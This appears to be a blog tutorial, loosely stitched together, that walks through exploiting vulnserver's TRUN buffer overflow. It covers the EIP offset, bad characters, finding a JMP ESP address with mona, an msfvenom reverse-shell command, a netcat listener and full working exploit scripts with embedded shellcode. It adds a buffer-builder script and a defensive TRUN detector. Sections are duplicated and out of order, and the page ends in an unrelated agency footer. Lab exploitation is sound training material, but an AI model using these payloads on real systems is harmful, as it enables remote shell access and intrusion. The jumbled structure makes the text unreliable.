What, you are getting an error saying EIP has been overwritten by 42424242 and the debugger doesn't know what to do? LOL. It's because the process is still sitting in the crash from the previous run (3.py). Quit Immunity Debugger, restart vulnserver, reopen Immunity with administrator permissions and attach vulnserver again.

Now find the 0x625011af address and set the breakpoint again. Now hit play.

Now go to the terminal and run the Python file that you have created. Immunity pauses at the breakpoint, and if you look at the Registers pane you will find that EIP is 625011AF!



Awesome, this means we own EIP and can load any address into it. EIP is the ultimate pointer: whatever address we place there, the program goes to that room and executes whatever the room contains. Here the room contains JMP ESP, which immediately sends execution on to the bytes that follow our fake return address on the stack.

That means, so far our main tasks were 3

1. Gain control of EIP (the ultimate pointer)

2. Find an address with no protections that holds JMP ESP

3. Set that address as the value that lands in EIP

Now that all 3 main tasks are complete, it's time to place a reverse shell right after that address.



Generating Shellcode

Now we have to place a payload right after the jump (inside that room) so that it connects back to us. The CPU only runs machine code, so the payload must be generated as raw bytes, with \x00 excluded because it is our bad character. In the Kali Linux terminal, type:

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"

LHOST is the Kali IP the shell will connect back to, -b "\x00" tells the encoder to avoid the bad character, and EXITFUNC=thread makes the payload exit only its own thread, so vulnserver is not killed when the shell closes.

This generates something like the byte string below, which we copy into another Python file (each line gets a b prefix so Python 3 treats it as bytes),

#!/usr/bin/env python3
import socket
import sys

# msfvenom windows/shell_reverse_tcp, x86, encoded to avoid \x00
overflow = (b"\xda\xcc\xba\x46\x10\x1d\x87\xd9\x74\x24\xf4\x5b\x31\xc9"
            b"\xb1\x52\x83\xc3\x04\x31\x53\x13\x03\x15\x03\xff\x72\x65"
            b"\xcb\x7d\x7c\x95\x0c\xe2\xf4\x70\x3d\x22\x62\xf1\x6e\x92"
            b"\xe0\x57\x83\x59\xa4\x43\x10\x2f\x61\x64\x91\x9a\x57\x4b"
            b"\x22\xb6\xa4\xca\xa0\xc5\xf8\x2c\x98\x05\x0d\x2d\xdd\x78"
            b"\xfc\x7f\xb6\xf7\x53\x6f\xb3\x42\x68\x04\x8f\x43\xe8\xf9"
            b"\x58\x65\xd9\xac\xd3\x3c\xf9\x4f\x37\x35\xb0\x57\x54\x70"
            b"\x0a\xec\xae\x0e\x8d\x24\xff\xef\x22\x09\xcf\x1d\x3a\x4e"
            b"\xe8\xfd\x49\xa6\x0a\x83\x49\x7d\x70\x5f\xdf\x65\xd2\x14"
            b"\x47\x41\xe2\xf9\x1e\x02\xe8\xb6\x55\x4c\xed\x49\xb9\xe7"
            b"\x09\xc1\x3c\x27\x98\x91\x1a\xe3\xc0\x42\x02\xb2\xac\x25"
            b"\x3b\xa4\x0e\x99\x99\xaf\xa3\xce\x93\xf2\xab\x23\x9e\x0c"
            b"\x2c\x2c\xa9\x7f\x1e\xf3\x01\x17\x12\x7c\x8c\xe0\x55\x57"
            b"\x68\x7e\xa8\x58\x89\x57\x6f\x0c\xd9\xcf\x46\x2d\xb2\x0f"
            b"\x66\xf8\x15\x5f\xc8\x53\xd6\x0f\xa8\x03\xbe\x45\x27\x7b"
            b"\xde\x66\xed\x14\x75\x9d\x66\x11\x8a\x9f\x79\x4d\x88\x9f"
            b"\x94\xd1\x05\x79\xfc\xf9\x43\xd2\x69\x63\xce\xa8\x08\x6c"
            b"\xc4\xd5\x0b\xe6\xeb\x2a\xc5\x0f\x81\x38\xb2\xff\xdc\x62"
            b"\x15\xff\xca\x0a\xf9\x92\x90\xca\x74\x8f\x0e\x9d\xd1\x61"
            b"\x47\x4b\xcc\xd8\xf1\x69\x0d\xbc\x3a\x29\xca\x7d\xc4\xb0"
            b"\x9f\x3a\xe2\xa2\x59\xc2\xae\x96\x35\x95\x78\x40\xf0\x4f"
            b"\xcb\x3a\xaa\x3c\x85\xaa\x2b\x0f\x16\xac\x33\x5a\xe0\x50"
            b"\x85\x33\xb5\x6f\x2a\xd4\x31\x08\x56\x44\xbd\xc3\xd2\x64"
            b"\x5c\xc1\x2e\x0d\xf9\x80\x92\x50\xfa\x7f\xd0\x6c\x79\x75"
            b"\xa9\x8a\x61\xfc\xac\xd7\x25\xed\xdc\x48\xc0\x11\x72\x68"
            b"\xc1")

# filler + JMP ESP address (little-endian) + NOP sled + shellcode
shellcode = b"A" * 2003 + b"\xaf\x11\x50\x62" + b"\x90" * 32 + overflow

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('10.0.2.5', 9999))
    s.send(b"TRUN /.:/" + shellcode)
    s.close()
except Exception:
    print("Error connecting to server")
    sys.exit()

The 32 NOPs (\x90) between the address and the payload are padding: the msfvenom encoder's decoder stub writes a few bytes around ESP while unpacking itself, and the sled gives it room to do that without clobbering the payload.

Save it and change the mode to executable. This means our payload is ready. But as it is going to be a reverse shell connection, we have to open a listener (open a port) on Kali Linux so that it can connect back without any sweat.

Go to the terminal and open the port with netcat,

nc -nvlp 4444

This will start listening on port 4444.

Now the moment of truth! Finally it is time to execute the last Python file and get a shell. Before running it, close Immunity Debugger, as we won't be needing it anymore, and fire up vulnserver fresh with administrator access. Keep in mind that the shell you get runs with the privileges of the vulnserver process, no more and no less.

Are you ready? Fire the last Python script with the payload and OWN IT!
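Everything above assembles the final buffer by hand, which is where most exploit-dev mistakes happen (a hand-reversed address, a NUL sneaking into the shellcode, the sled going missing). Here is an added Python 3 version of the final script, written for this write-up and not part of the original post, that builds the same layout from named constants, packs the address with struct instead of typing the bytes backwards, and refuses to send anything containing a bad character. The 4-byte INT3 test payload is a standard first run: with vulnserver attached in Immunity, the \xcc bytes stop the debugger at ESP+32 and prove execution reached the buffer before you commit the real msfvenom output. The host and port constants are assumptions matching the page's lab.

```python
#!/usr/bin/env python3
"""Assemble and sanity-check the vulnserver TRUN exploit buffer before sending it."""
import socket
import struct

OFFSET = 2003            # filler bytes before the saved return address (pattern_offset result)
JMP_ESP = 0x625011af     # JMP ESP (FF E4) inside essfunc.dll, found with !mona find
BADCHARS = {0x00}        # TRUN only chokes on NUL: it is copied as a C string
NOP_SLED = 32            # scratch room for the msfvenom decoder stub
TARGET = ("10.0.2.5", 9999)   # assumed lab address of the vulnserver VM


def check_badchars(label, blob):
    """Raise if any byte of blob would be dropped or mangled by the target."""
    hit = sorted({b for b in blob if b in BADCHARS})
    if hit:
        raise ValueError("%s contains bad char(s): %s"
                         % (label, "".join("\\x%02x" % b for b in hit)))


def build_payload(shellcode, offset=OFFSET, ret=JMP_ESP, nops=NOP_SLED):
    """Filler + return address + NOP sled + shellcode, the layout of the final script.

    struct.pack("<I", ...) writes the address little-endian, so 0x625011af
    becomes af 11 50 62 without anyone reversing bytes by hand. Both the
    address and the shellcode are checked for bad characters first, because
    a NUL would silently truncate the buffer during the copy and the crash
    would then land somewhere confusing.
    """
    ret_bytes = struct.pack("<I", ret)
    check_badchars("return address", ret_bytes)
    check_badchars("shellcode", shellcode)
    return b"A" * offset + ret_bytes + b"\x90" * nops + shellcode


def send_trun(host, port, payload):
    """Deliver the buffer through the TRUN command; returns the bytes sent."""
    data = b"TRUN /.:/" + payload
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(data)
    return len(data)


# INT3 test shellcode: Immunity breaks on the first \xcc if the jump worked.
INT3_TEST = b"\xcc" * 4

if __name__ == "__main__":
    buf = build_payload(INT3_TEST)
    print("sending %d bytes, EIP will be %s" % (len(buf), buf[OFFSET:OFFSET + 4].hex()))
    send_trun(*TARGET, buf)
```

To go live, paste the msfvenom output in place of INT3_TEST and start nc -nvlp 4444 first; the bad-character check is also what tells you, up front, that an address such as 0x00401000 from the main executable is unusable here even though it would also hold a JMP ESP.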


Step 5 (Finding the Bad Characters)


To find bad characters create 4.py.

#!/usr/bin/python
import sys, socket

badchars = ( "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
  "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
  "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
  "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
  "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
  "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
  "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
  "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
  "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
  "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
  "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
  "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
  "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
  "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
  "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
  "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

shellcode = "A" * 2003 + "B" * 4 + badchars

try:

	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('10.0.2.5',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close()

except:

	print "Error connecting to server"
	sys.exit()


Go to immunity Debugger and Right Click on ESP > Follow in Dump



Step 6 (Finding the right Module)



Go to internet > Search Mona module > Download mona.py > 

Copy paste it to C:\Program Files (x86)\Immunity Inc\Immunity Debugger\PyCommands



Go to the immunity debugger > go to this search section and type !mona modules > Enter




This will show us which has no protection modules. So that we can use that, manipulate to jump to our malicious code.



In this case it will show essfunc.dll which is attached to vulnserver (our program). So this is basically a room with no security. So now we have to jump to this room so that we can do whatever we want. Now to do this jump we have to know the OP-code. 



So to jump to a certain destination we need 2 things,



The jump code (The language which machine understand) and the Address




To translate the assembly jump instruction into its opcode, nasm_shell comes in.

Go to Terminal > locate nasm_shell > it will give you the path of the ruby file (.rb) > copy that > paste it in the terminal > this opens nasm_shell, which looks like below,


nasm



Now type the following in the shell,


nasm > JMP ESP



It will return the following


00000000  FFE4              jmp esp
nasm >




So we got the jump code (FF E4). Now we need the address.

Go to Immunity Debugger and, in the command bar at the bottom, type this


!mona find -s "\xff\xe4" -m essfunc.dll



This will give us several addresses inside essfunc.dll where the bytes FF E4 (JMP ESP) are located.




That means we might have not one but multiple rooms with no security! How cool is that? So we could just tell the program to jump to one of these addresses, and in that room we can run our malicious code to gain root access. So let's start by trying the first address, which is 0x625011af.



Now create another python file and put this address in the shellcode, written in little-endian byte order (least significant byte first), so 0x625011af becomes "\xaf\x11\x50\x62".



#!/usr/bin/python
import sys, socket

# 2003 bytes of filler, then the JMP ESP address 0x625011af in little-endian order
shellcode = "A" * 2003 + "\xaf\x11\x50\x62"

try:
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('10.0.2.5',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close()
except:
	print "Error connecting to server"   # Python 2 syntax: run this file with python2
	sys.exit()

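The little-endian step above, and the "EIP has been overwritten by 424242" crash seen later, both come down to how a 32-bit value is laid out in memory. This is an added Python 3 example, not part of the original tutorial, using the tutorial's own offset (2003) and address (0x625011af); the helper names are my own.

```python
import struct

FILLER = 2003         # bytes sent before the 4 that land in EIP (from the tutorial)
JMP_ESP = 0x625011af  # JMP ESP address found in essfunc.dll (from the tutorial)


def addr_to_le(addr):
    """32-bit address -> the 4 bytes it must occupy in memory (little-endian)."""
    return struct.pack("<I", addr)


def le_to_addr(raw4):
    """4 bytes as they sit in memory -> the value the CPU loads into EIP."""
    return struct.unpack("<I", raw4)[0]


def build_buffer(filler=FILLER, eip=JMP_ESP):
    """Filler followed by the EIP value in memory order (what the script above sends)."""
    return b"A" * filler + addr_to_le(eip)


def eip_offset(sent, crash_eip):
    """Crash triage: given the bytes that were sent and the EIP value the debugger
    reported, return the offset in the input that ended up in EIP, or -1 if the
    value did not come from this input. With a repeating filler (all "A") only the
    first match is reported, so the answer is only unambiguous for distinct bytes."""
    return sent.find(addr_to_le(crash_eip))


if __name__ == "__main__":
    print(addr_to_le(JMP_ESP))                          # b'\xaf\x11\x50\x62'
    print(hex(le_to_addr(b"BBBB")))                     # 0x42424242, the "424242" crash
    print(eip_offset(b"A" * 2003 + b"BBBB", 0x42424242))  # 2003
```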






Now go to Immunity Debugger and click the last icon under the Options button.



It will ask you to input the address; type the address.



This marks the address with a blue ribbon marker, showing JMP ESP at that address.



Now press F2, which highlights this address in cyan. This means a breakpoint is set here.







Now click the red play button, which sits at the bottom middle between the Debug and Plugins menus. This switches Immunity Debugger from Paused to Running.



Are you now getting an error saying EIP has been overwritten by 424242 and the debugger doesn't know what to do? LOL. That's because the program crashed. Just quit Immunity Debugger, reopen it with administrator permissions and attach vulnserver again.


Now find the 0x625011af address and set the breakpoint again. Now hit play.


Now go to the terminal and run the python file you just created. Immunity Debugger will stop, and if you look at EIP you will see that it holds 625011AF!



Awesome, this means we control EIP and can set it to any address. EIP is the ultimate pointer: it holds the address of the next instruction, and the program follows it. So when we place our desired address in it, the program goes to our desired room and performs whatever that room has in it.



That means, so far, our main tasks were these 3:

1. Gain control of EIP (the ultimate pointer)

2. Find an address with no security or restrictions

3. Set EIP to that address value



Now that all 3 main tasks are complete, it's time to place a reverse shell at that address.



Generating ShellCode

Now we have to place a payload at that address (inside that room) so that it connects back to us. But since the CPU only runs machine code, we have to translate the payload into machine code. For that, type the following in the Kali Linux terminal,

msfvenom -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=4444 EXITFUNC=thread -f c -a x86 -b "\x00"






This generates a C-formatted byte array. Copy this payload into another python file like below,


#!/usr/bin/python
import sys, socket

# msfvenom output (windows/shell_reverse_tcp, x86, bad char \x00 excluded)
overflow = ("\xda\xcc\xba\x46\x10\x1d\x87\xd9\x74\x24\xf4\x5b\x31\xc9"
"\xb1\x52\x83\xc3\x04\x31\x53\x13\x03\x15\x03\xff\x72\x65"
"\xcb\x7d\x7c\x95\x0c\xe2\xf4\x70\x3d\x22\x62\xf1\x6e\x92"
"\xe0\x57\x83\x59\xa4\x43\x10\x2f\x61\x64\x91\x9a\x57\x4b"
"\x22\xb6\xa4\xca\xa0\xc5\xf8\x2c\x98\x05\x0d\x2d\xdd\x78"
"\xfc\x7f\xb6\xf7\x53\x6f\xb3\x42\x68\x04\x8f\x43\xe8\xf9"
"\x58\x65\xd9\xac\xd3\x3c\xf9\x4f\x37\x35\xb0\x57\x54\x70"
"\x0a\xec\xae\x0e\x8d\x24\xff\xef\x22\x09\xcf\x1d\x3a\x4e"
"\xe8\xfd\x49\xa6\x0a\x83\x49\x7d\x70\x5f\xdf\x65\xd2\x14"
"\x47\x41\xe2\xf9\x1e\x02\xe8\xb6\x55\x4c\xed\x49\xb9\xe7"
"\x09\xc1\x3c\x27\x98\x91\x1a\xe3\xc0\x42\x02\xb2\xac\x25"
"\x3b\xa4\x0e\x99\x99\xaf\xa3\xce\x93\xf2\xab\x23\x9e\x0c"
"\x2c\x2c\xa9\x7f\x1e\xf3\x01\x17\x12\x7c\x8c\xe0\x55\x57"
"\x68\x7e\xa8\x58\x89\x57\x6f\x0c\xd9\xcf\x46\x2d\xb2\x0f"
"\x66\xf8\x15\x5f\xc8\x53\xd6\x0f\xa8\x03\xbe\x45\x27\x7b"
"\xde\x66\xed\x14\x75\x9d\x66\x11\x8a\x9f\x79\x4d\x88\x9f"
"\x94\xd1\x05\x79\xfc\xf9\x43\xd2\x69\x63\xce\xa8\x08\x6c"
"\xc4\xd5\x0b\xe6\xeb\x2a\xc5\x0f\x81\x38\xb2\xff\xdc\x62"
"\x15\xff\xca\x0a\xf9\x92\x90\xca\x74\x8f\x0e\x9d\xd1\x61"
"\x47\x4b\xcc\xd8\xf1\x69\x0d\xbc\x3a\x29\xca\x7d\xc4\xb0"
"\x9f\x3a\xe2\xa2\x59\xc2\xae\x96\x35\x95\x78\x40\xf0\x4f"
"\xcb\x3a\xaa\x3c\x85\xaa\x2b\x0f\x16\xac\x33\x5a\xe0\x50"
"\x85\x33\xb5\x6f\x2a\xd4\x31\x08\x56\x44\xbd\xc3\xd2\x64"
"\x5c\xc1\x2e\x0d\xf9\x80\x92\x50\xfa\x7f\xd0\x6c\x79\x75"
"\xa9\x8a\x61\xfc\xac\xd7\x25\xed\xdc\x48\xc0\x11\x72\x68"
"\xc1")


# filler to EIP, JMP ESP address (little-endian), 32-byte NOP sled, then the payload
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow

try:
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(('10.0.2.5',9999))
	s.send(('TRUN /.:/' + shellcode))
	s.close()
except:
	print "Error connecting to server"   # Python 2 syntax: run this file with python2
	sys.exit()

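From the defender's side, the request above has a recognisable shape on the wire: an oversized TRUN argument, a known JMP ESP address in little-endian form, a NOP sled and raw binary bytes. This added Python 3 checker (not part of the original tutorial or vulnserver) flags those indicators in TRUN requests; the 2000-byte argument limit and 5% binary threshold are assumptions, and the sample traffic is constructed, not captured.

```python
import re

TRUN_PREFIX = b"TRUN "
ARG_LIMIT = 2000                      # assumption: longest TRUN argument treated as legitimate
JMP_ESP_LE = b"\xaf\x11\x50\x62"      # 0x625011af (essfunc.dll) in little-endian order
NOP_SLED = re.compile(rb"\x90{16,}")  # 16 or more consecutive x86 NOPs


def inspect_trun(request):
    """Return a dict of indicators found in one raw TRUN request (bytes).
    An empty dict means nothing suspicious was seen."""
    if not request.startswith(TRUN_PREFIX):
        return {}
    arg = request[len(TRUN_PREFIX):]
    hits = {}
    if len(arg) > ARG_LIMIT:
        hits["oversized"] = len(arg)
    if NOP_SLED.search(arg):
        hits["nop_sled"] = True
    if JMP_ESP_LE in arg:
        hits["known_jmp_esp"] = "0x625011af"
    binary = sum(1 for b in arg if b < 0x20 or b > 0x7e)
    if arg and binary / len(arg) > 0.05:       # assumption: 5% non-printable is unusual
        hits["binary_ratio"] = round(binary / len(arg), 2)
    return hits


def triage(requests):
    """Verdict per request: 'block' on two or more indicators, 'warn' on one."""
    out = []
    for req in requests:
        hits = inspect_trun(req)
        verdict = "block" if len(hits) >= 2 else "warn" if hits else "ok"
        out.append((verdict, hits))
    return out


# Constructed sample traffic: a normal command, one shaped like the final
# exploit script (with a 4-byte stand-in for the payload), and a long but
# otherwise plain argument.
SAMPLES = [
    b"TRUN /.:/hello",
    b"TRUN /.:/" + b"A" * 2003 + JMP_ESP_LE + b"\x90" * 32 + b"\xda\xcc\xba\x46",
    b"TRUN /.:/" + b"A" * 2500,
]

if __name__ == "__main__":
    for verdict, hits in triage(SAMPLES):
        print(verdict, hits)
```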



Save it > make it executable. Our payload is now ready. But since this is going to be a reverse shell connection, we have to open a listener (open a port) in Kali Linux so that it can connect back without any sweat,


Go to the terminal and open a port with the help of netcat


nc -nvlp 4444


This will start listening on port 4444


Now the moment of truth! Finally it is time to execute the last python file and gain root access. Before running it, close Immunity Debugger, as we won't be needing it anymore, and fire up vulnserver with administrator access.


Are you ready? Fire the last python with the payload and OWN IT !


Let's talk

Connecting with our clients to create tailor-made solutions

We specialize in crafting exceptional digital experiences to help our clients achieve their business goals.

Framer template crafted with love by Akane Asahi